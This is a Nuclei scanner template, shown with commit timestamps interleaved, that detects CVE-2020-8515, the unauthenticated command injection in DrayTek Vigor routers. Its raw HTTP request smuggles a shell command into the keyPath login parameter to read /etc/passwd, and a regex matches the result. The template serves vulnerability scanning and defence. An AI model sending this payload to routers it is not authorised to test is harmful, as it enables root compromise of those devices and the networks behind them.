nuclei-templates/http/cves/2020/CVE-2020-8515.yaml

49 lines
2.1 KiB
YAML
Raw Normal View History

2021-01-28 15:30:20 +00:00
id: CVE-2020-8515
info:
name: DrayTek - Remote Code Execution
2021-01-28 15:30:20 +00:00
author: pikpikcu
severity: critical
description: DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected router, leading to complete compromise of the device and potential unauthorized access to the network.
2023-09-06 12:22:36 +00:00
remediation: This issue has been fixed in Vigor3900/2960/300B v1.5.1.
reference:
2021-03-24 06:56:49 +00:00
- https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)
- https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/
- https://nvd.nist.gov/vuln/detail/CVE-2020-8515
- https://sku11army.blogspot.com/2020/01/draytek-unauthenticated-rce-in-draytek.html
- https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-%28cve-2020-8515%29/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-8515
cwe-id: CWE-78
epss-score: 0.9699
epss-percentile: 0.99672
2023-09-06 12:22:36 +00:00
cpe: cpe:2.3:o:draytek:vigor2960_firmware:1.3.1:beta:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: draytek
product: vigor2960_firmware
2023-12-05 09:50:33 +00:00
tags: cve,cve2020,rce,kev,draytek
2021-01-28 15:30:20 +00:00
http:
2021-01-28 15:30:20 +00:00
- raw:
- |
POST /cgi-bin/mainfunction.cgi HTTP/1.1
Host: {{Hostname}}
action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a
matchers-condition: and
matchers:
- type: regex
2023-07-11 19:49:27 +00:00
part: body
2021-01-28 15:30:20 +00:00
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2021-01-28 18:53:43 +00:00
- type: status
status:
- 200
# digest: 4a0a0047304502205d49bd846897af9c1cc346444005995efcafefd3922e745bf01416305e2d53100221008b90bb94f55f741c1d8ba0d16329f4bc65667d2d91e9dc41f960f61a959041b3:922c64590222798bb761d5b6d8e72950